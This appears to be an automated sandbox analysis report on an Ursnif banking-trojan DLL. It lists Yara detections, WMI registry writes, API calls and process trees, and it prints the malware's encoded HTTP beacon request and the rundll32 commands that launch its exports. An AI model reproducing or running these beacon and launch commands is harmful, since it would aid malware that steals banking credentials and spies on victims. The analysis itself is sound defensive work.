                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3rD/GOZ7HTzmadDT3EaU6FMaux/8v8OfzSGDIfuI/2JFzbGpa/48oXcRIDJ4CWvryCIOce07l/PRm5ekLf_2/FWrUO776bg5a24LJQ/ndIkg4SZse4c/jL7OG2Z00xG/sTPur68E_2BxS_/2FjGzTP4SxNpm_2FiKI7j/WPoFKl4.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49784 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49793 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49794 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.151.82:443 -> 192.168.2.3:49795 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49796 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.151.2:443 -> 192.168.2.3:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.151.66:443 -> 192.168.2.3:49798 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49846 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49848 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000002.829711196.0000000004CD0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573182276.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.575886663.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577592974.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577142287.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.621678183.0000000004F4B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.574590732.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573615076.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.828440646.00000000030D0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.574198555.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573998703.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576726243.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.619056224.000000000334B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577395162.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.578289206.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576921901.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573750690.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573091337.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.707612619.000000000314F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.574533141.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.711256543.0000000004D4F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576829931.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.664577952.000000000324D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.667981816.0000000004E4D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577047375.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576567742.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6444, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4352, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.2f3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2f194a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2f3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.d5a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.68a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.68a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.c40000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.d5a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.8da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.8da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2f194a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.828285916.0000000002F19000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.512556680.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.492597168.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.829472336.0000000004949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.512003320.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.506220086.0000000000680000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.492790466.0000000002F30000.00000040.00000001.sdmp, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000002.829711196.0000000004CD0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573182276.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.575886663.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577592974.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577142287.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.621678183.0000000004F4B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.574590732.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573615076.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.828440646.00000000030D0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.574198555.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573998703.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576726243.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.619056224.000000000334B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577395162.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.578289206.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576921901.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573750690.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573091337.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.707612619.000000000314F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.574533141.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.711256543.0000000004D4F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576829931.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.664577952.000000000324D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.667981816.0000000004E4D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577047375.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576567742.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6444, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4352, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.2f3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2f194a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2f3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.d5a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.68a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.68a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.c40000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.d5a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.8da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.8da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2f194a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.828285916.0000000002F19000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.512556680.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.492597168.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.829472336.0000000004949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.512003320.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.506220086.0000000000680000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.492790466.0000000002F30000.00000040.00000001.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: m87xfb63XU.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 876
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C21B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C44C40
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C42B76
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C4AF24
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7D5600
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E80D630
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E823CCE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E80B597
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E81A2B1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7FE8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_008F4C40
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_008FAF24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_008F2B76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E7D5600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E80D630
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E80B597
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E81A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E7FE8C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E7FABD1 appears 91 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E7FABD1 appears 91 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C1273 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C13B8 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C23D5 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C45D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C4B149 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_008F5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_008FB149 NtQueryVirtualMemory,
                      Source: m87xfb63XU.dllReversingLabs: Detection: 22%
                      Source: m87xfb63XU.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 876
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 832
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFBA.tmpJump to behavior
                      Source: classification engineClassification label: mal88.troj.evad.winDLL@17/12@22/6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C44A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6936
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6952
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4520
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: m87xfb63XU.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: m87xfb63XU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb{: source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.557399888.00000000034E1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: iphlpapi.pdb_:IE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb_POei source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdbT$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593784866.0000000004EF2000.00000004.00000040.sdmp
                      Source: Binary string: lbase.pdb source: WerFault.exe, 0000000D.00000003.552510597.0000000004D73000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wUxTheme.pdbK@q source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbi: source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.557389440.00000000034DB000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdbEPue source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.560947472.00000000050F2000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580864219.0000000005704000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593490738.0000000004EE2000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593784866.0000000004EF2000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbQPIer source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000D.00000002.586318313.00000000008D2000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000002.594044860.0000000002FE2000.00000004.00000001.sdmp
